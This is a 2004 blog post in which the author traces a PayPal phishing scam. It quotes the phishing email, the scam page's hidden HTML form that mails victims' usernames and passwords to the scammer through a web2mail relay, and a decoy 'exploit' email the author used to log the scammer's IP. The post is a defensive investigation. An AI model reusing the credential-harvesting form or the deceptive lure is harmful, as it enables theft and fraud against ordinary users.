ImperialViolet

Tracking down a PayPal scammer (02 May 2004)

I was bored last night (you know, revision, makes you do strange things...). So I actually opened one of those scam PayPal emails:

It has come to our attention that your PayPal account information needs to be updated as part of our continuing commitment to protect your account and to reduce the instance of fraud on our website. If you could please take 5-10 minutes out of your online experience and update your personal records you will not run into any future problems with the online service.

The link text is at www.paypal.com, but the destination is http://210.120.9.236/paypal/login.htm. That's a solaris box running every service under the sun. I've no doubt that it's a hacked box, so I've emailed the netblock owner (no answer). I also emailed the netblock owner for the host where the email came from - pretty prompt answer from them (they are looking into it). But let's have a look at the HTML from the scam page (which looks identical to a real PayPal page):

<FORM action=http://www.i-st.net/cgi-bin/web2mail.cgi method=post><INPUT type=hidden value=mirub@linuxmail.org name=.email_target> <INPUT type=hidden value=username-password name=.mail_subject> <INPUT type=hidden value=http://210.120.9.236/paypal/loginloading.htm name=.thanks_url>

Basically, it's emailing him via linuxmail.org (I've emailed linuxmail and told them this). But that's about as far as I can go. I can't find out who is reading that email account. Or can I?

Subject: New remote root exploit for OpenSSH 3.7.x
To: mirub@linuxmail.org
From: xyz@abc.com

I hear that you're an elite hacker. I'd like to share exploits with you, so as
a gesture of good faith (to get the ball rolling) this exploit is doing the
blackhat rounds but hasn't hit the mainstream yet. Many juicy boxes are running
vulnerable sshds:

http://www.doc.ic.ac.uk/~guest01/openssh-xploit.c

Hope to hear from you...

And the contents of http://www.doc.ic.ac.uk/~guest01/openssh-xploit.c:

Well, that'll be your IP in the weblogs.

Cheers.

And indeed:

62.162.228.219 - - [02/May/2004:11:54:26 +0100] "GET
/~guest01/openssh-xploit.c HTTP/1.1" 200 51
"http://adsfree.linuxmail.org/scripts/mail/mesg.mail?folder=INBOX&order=Newest&
mview=a&mstart=1&.popup=0&msg_uid=1083452662&mprev=1083452665&mnext=1083452657"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
inetnum:      62.162.224.0 - 62.162.255.255
netname:      MTnet-ADSL_subnet
descr:        ADSL subnet
descr:        Skopje, Macedonia
country:      MK

Very little chance of getting him in Macedonia. Oh well, at the very least he probably wet himself :)